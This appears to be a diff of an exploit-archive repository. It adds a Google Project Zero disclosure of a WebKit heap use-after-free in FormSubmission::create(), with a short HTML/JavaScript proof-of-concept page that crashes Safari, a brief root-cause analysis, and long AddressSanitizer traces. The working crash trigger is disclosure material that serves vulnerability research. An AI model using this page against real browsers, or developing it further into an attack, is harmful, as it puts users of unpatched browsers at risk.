#22 0x1152a7b2e in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x10b2b2e)
#23 0x11558d786 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1398786)
#24 0x114ae8a05 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8f3a05)
#25 0x114ae852f in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8f352f)
#26 0x1149d7431 in WebCore::DOMWindow::dispatchEvent(WebCore::Event&, WebCore::EventTarget*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7e2431)
#27 0x1149e6c2f in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7f1c2f)
#28 0x1148f5aef in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x700aef)
#29 0x1148f088e in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6fb88e)
#30 0x114c5c3a1 in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa673a1)
#31 0x114c598da in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa648da)
#32 0x11490e0ad in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7190ad)
#33 0x114e0879d in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc1379d)
#34 0x1149a324c in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7ae24c)
#35 0x11496786f in WebCore::DocumentLoader::finishedLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x77286f)
#36 0x114447fb7 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x252fb7)
#37 0x114442b69 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x24db69)
#38 0x1169f37e4 in WebCore::SubresourceLoader::didFinishLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x27fe7e4)
#39 0x10d266615 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(double)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(double)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x8de615)
#40 0x10d265c2a in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x8ddc2a)
#41 0x10cc141f9 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x28c1f9)
#42 0x10ca37448 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0xaf448)
#43 0x10ca40614 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0xb8614)
#44 0x111f1da04 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18b6a04)
#45 0x111f1ff1e in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18b8f1e)
#46 0x7fff9a64c7e0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0xaa7e0)
#47 0x7fff9a62bf1b in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x89f1b)
#48 0x7fff9a62b43e in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x8943e)
#49 0x7fff9a62ae37 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x88e37)
#50 0x7fff904ba934 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30934)
#51 0x7fff904ba76e in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x3076e)
#52 0x7fff904ba5ae in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x305ae)
#53 0x7fff8e2e5df5 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x48df5)
#54 0x7fff8e2e5225 in -[NSApplication _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x48225)
#55 0x7fff8e2d9d7f in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x3cd7f)
#56 0x7fff8e2a3367 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x6367)
#57 0x7fff86665193 in _xpc_objc_main (/usr/lib/system/libxpc.dylib+0x11193)
#58 0x7fff86663bbd in xpc_main (/usr/lib/system/libxpc.dylib+0xfbbd)
#59 0x10c973b73 in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development+0x100001b73)
#60 0x7fff8e1e35ac in start (/usr/lib/system/libdyld.dylib+0x35ac)
0x60c000086510 is located 16 bytes inside of 128-byte region [0x60c000086500,0x60c000086580)
allocated by thread T0 here:
#0 0x10ef3c790 in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4b790)
#1 0x7fff867345a0 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib+0x25a0)
#2 0x111f71db4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x190adb4)
#3 0x111f6712b in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x190012b)
#4 0x111efe995 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1897995)
#5 0x114e347c0 in WTF::VectorBufferBase<WebCore::FormAssociatedElement*>::allocateBuffer(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc3f7c0)
#6 0x114e34ae3 in WTF::Vector<WebCore::FormAssociatedElement*, 0ul, WTF::CrashOnOverflow, 16ul>::reserveCapacity(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc3fae3)
#7 0x114e4b383 in WTF::Vector<WebCore::FormAssociatedElement*, 0ul, WTF::CrashOnOverflow, 16ul>::expandCapacity(unsigned long, WebCore::FormAssociatedElement**) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc56383)
#8 0x114e478f0 in void WTF::Vector<WebCore::FormAssociatedElement*, 0ul, WTF::CrashOnOverflow, 16ul>::insert<WebCore::FormAssociatedElement*&>(unsigned long, WebCore::FormAssociatedElement*&&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc528f0)
#9 0x114e47770 in WebCore::HTMLFormElement::registerFormElement(WebCore::FormAssociatedElement*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc52770)
#10 0x114bfe4d8 in WebCore::FormAssociatedElement::setForm(WebCore::HTMLFormElement*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa094d8)
#11 0x114bfe79c in WebCore::FormAssociatedElement::insertedInto(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa0979c)
#12 0x114e3c080 in WebCore::HTMLFormControlElement::insertedInto(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc47080)
#13 0x114f0a287 in WebCore::HTMLTextFormControlElement::insertedInto(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xd15287)
#14 0x11459c476 in WebCore::notifyNodeInsertedIntoDocument(WebCore::ContainerNode&, WebCore::Node&, WTF::Vector<WTF::Ref<WebCore::Node>, 11ul, WTF::CrashOnOverflow, 16ul>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x3a7476)
#15 0x11459c318 in WebCore::notifyChildNodeInserted(WebCore::ContainerNode&, WebCore::Node&, WTF::Vector<WTF::Ref<WebCore::Node>, 11ul, WTF::CrashOnOverflow, 16ul>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x3a7318)
#16 0x11458bc77 in WebCore::ContainerNode::notifyChildInserted(WebCore::Node&, WebCore::ContainerNode::ChildChangeSource) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x396c77)
#17 0x11458a69a in WebCore::ContainerNode::parserAppendChild(WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x39569a)
#18 0x114de009c in WebCore::executeInsertTask(WebCore::HTMLConstructionSiteTask&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbeb09c)
#19 0x114dd9007 in WebCore::HTMLConstructionSite::executeQueuedTasks() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbe4007)
#20 0x114e09d48 in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc14d48)
#21 0x114e09902 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc14902)
#22 0x114e08b94 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc13b94)
#23 0x114e0a58d in WebCore::HTMLDocumentParser::append(WTF::RefPtr<WTF::StringImpl>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc1558d)
#24 0x114877661 in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x682661)
#25 0x1149a31f8 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7ae1f8)
#26 0x11496786f in WebCore::DocumentLoader::finishedLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x77286f)
#27 0x114447fb7 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x252fb7)
#28 0x114442b69 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x24db69)
#29 0x1169f37e4 in WebCore::SubresourceLoader::didFinishLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x27fe7e4)
SUMMARY: AddressSanitizer: negative-size-param (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x41f0b) in __asan_memmove
==1226==ABORTING
-->

195
platforms/multiple/dos/41811.html Executable file
View file

@ -0,0 +1,195 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1090
There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on a nightly version of WebKit. The PoC has also been observed to crash Safari 10.0.2 on Mac.
Please note: This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.
With any fix, please give credit for identifying the vulnerability to Ivan Fratric of Google Project Zero.
PoC:
=================================================================
-->
<script>
function go() {
object.name = "foo";
input.autofocus = true;
output.appendChild(input);
form.submit();
}
function eventhandler() {
for(var i=0;i<100;i++) {
var e = document.createElement("input");
form.appendChild(e);
}
}
</script>
<body onload=go()>
<form id="form">
<object id="object">
<output id="output">a</output>
<input id="input" onfocus="eventhandler()">
<!--
=================================================================
Preliminary analysis:
The bug is in FormSubmission::create(). This function traverses the vector of form.associatedElements(), however it is possible for JavaScript event handlers to trigger while the vector is being traversed and to resize (reallocate) the vector's buffer.
ASan log:
=================================================================
==1013==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c0000a3b48 at pc 0x0001126c7be0 bp 0x7fff55811d50 sp 0x7fff55811d48
READ of size 8 at 0x60c0000a3b48 thread T0
#0 0x1126c7bdf in WebCore::FormSubmission::create(WebCore::HTMLFormElement*, WebCore::FormSubmission::Attributes const&, WTF::PassRefPtr<WebCore::Event>, WebCore::LockHistory, WebCore::FormSubmissionTrigger) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa55bdf)
#1 0x1128c2df1 in WebCore::HTMLFormElement::submit(WebCore::Event*, bool, bool, WebCore::FormSubmissionTrigger) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc50df1)
#2 0x11312acf0 in WebCore::jsHTMLFormElementPrototypeFunctionSubmitCaller(JSC::ExecState*, WebCore::JSHTMLFormElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x14b8cf0)
#3 0x1131273cd in long long WebCore::BindingCaller<WebCore::JSHTMLFormElement>::callOperation<&(WebCore::jsHTMLFormElementPrototypeFunctionSubmitCaller(JSC::ExecState*, WebCore::JSHTMLFormElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x14b53cd)
#4 0x3212cc401027 (<unknown module>)
#5 0x10f3aa26c in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12c526c)
#6 0x10f3aa26c in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12c526c)
#7 0x10f3a383a in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12be83a)
#8 0x10f06247d in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf7d47d)
#9 0x10efecaa3 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf07aa3)
#10 0x10e6de991 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x5f9991)
#11 0x10e6deabb in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x5f9abb)
#12 0x10e6dee06 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x5f9e06)
#13 0x112d24b2e in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x10b2b2e)
#14 0x11300a786 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1398786)
#15 0x112565a05 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8f3a05)
#16 0x11256552f in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8f352f)
#17 0x112454431 in WebCore::DOMWindow::dispatchEvent(WebCore::Event&, WebCore::EventTarget*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7e2431)
#18 0x112463c2f in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7f1c2f)
#19 0x112372aef in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x700aef)
#20 0x11236d88e in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6fb88e)
#21 0x1126d93a1 in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa673a1)
#22 0x111ed86f7 in WebCore::CachedResourceLoader::loadDone(WebCore::CachedResource*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2666f7)
#23 0x1144728a3 in WebCore::SubresourceLoader::notifyDone() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x28008a3)
#24 0x11447081b in WebCore::SubresourceLoader::didFinishLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x27fe81b)
#25 0x10acdf615 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(double)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(double)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x8de615)
#26 0x10acdec2a in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x8ddc2a)
#27 0x10a68d1f9 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x28c1f9)
#28 0x10a4b0448 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0xaf448)
#29 0x10a4b9614 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0xb8614)
#30 0x10f99bab3 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18b6ab3)
#31 0x10f99df1e in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18b8f1e)
#32 0x7fff9aa2c7e0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0xaa7e0)
#33 0x7fff9aa0bf1b in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x89f1b)
#34 0x7fff9aa0b43e in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x8943e)
#35 0x7fff9aa0ae37 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x88e37)
#36 0x7fff8c153934 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30934)
#37 0x7fff8c15376e in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x3076e)
#38 0x7fff8c1535ae in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x305ae)
#39 0x7fff882d1df5 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x48df5)
#40 0x7fff882d1225 in -[NSApplication _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x48225)
#41 0x7fff882c5d7f in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x3cd7f)
#42 0x7fff8828f367 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x6367)
#43 0x7fff9375e193 in _xpc_objc_main (/usr/lib/system/libxpc.dylib+0x11193)
#44 0x7fff9375cbbd in xpc_main (/usr/lib/system/libxpc.dylib+0xfbbd)
#45 0x10a3ebb73 in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development+0x100001b73)
#46 0x7fff9765e5ac in start (/usr/lib/system/libdyld.dylib+0x35ac)
0x60c0000a3b48 is located 8 bytes inside of 128-byte region [0x60c0000a3b40,0x60c0000a3bc0)
freed by thread T0 here:
#0 0x10c9b9cf4 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4bcf4)
#1 0x10f9e636f in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x190136f)
#2 0x1128c8383 in WTF::Vector<WebCore::FormAssociatedElement*, 0ul, WTF::CrashOnOverflow, 16ul>::expandCapacity(unsigned long, WebCore::FormAssociatedElement**) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc56383)
#3 0x1128c48f0 in void WTF::Vector<WebCore::FormAssociatedElement*, 0ul, WTF::CrashOnOverflow, 16ul>::insert<WebCore::FormAssociatedElement*&>(unsigned long, WebCore::FormAssociatedElement*&&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc528f0)
#4 0x1128c4770 in WebCore::HTMLFormElement::registerFormElement(WebCore::FormAssociatedElement*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc52770)
#5 0x11267b4d8 in WebCore::FormAssociatedElement::setForm(WebCore::HTMLFormElement*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa094d8)
#6 0x11267bd4e in WebCore::FormAssociatedElement::resetFormOwner() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa09d4e)
#7 0x1128e2fcd in WebCore::HTMLInputElement::finishedInsertingSubtree() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc70fcd)
#8 0x112008db8 in WebCore::ContainerNode::notifyChildInserted(WebCore::Node&, WebCore::ContainerNode::ChildChangeSource) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x396db8)
#9 0x112008a22 in WebCore::ContainerNode::updateTreeAfterInsertion(WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x396a22)
#10 0x112008518 in WebCore::ContainerNode::appendChildWithoutPreInsertionValidityCheck(WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x396518)
#11 0x11200ab16 in WebCore::ContainerNode::appendChild(WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x398b16)
#12 0x113b094eb in WebCore::Node::appendChild(WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1e974eb)
#13 0x1133318b7 in WebCore::JSNode::appendChild(JSC::ExecState&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x16bf8b7)
#14 0x11332e951 in WebCore::jsNodePrototypeFunctionAppendChildCaller(JSC::ExecState*, WebCore::JSNode*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x16bc951)
#15 0x11332aea2 in long long WebCore::BindingCaller<WebCore::JSNode>::callOperation<&(WebCore::jsNodePrototypeFunctionAppendChildCaller(JSC::ExecState*, WebCore::JSNode*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x16b8ea2)
#16 0x11332ad4e in WebCore::jsNodePrototypeFunctionAppendChild(JSC::ExecState*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x16b8d4e)
#17 0x3212cc401027 (<unknown module>)
#18 0x10f3aa1fa in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12c51fa)
#19 0x10f3aa26c in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12c526c)
#20 0x10f3a383a in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12be83a)
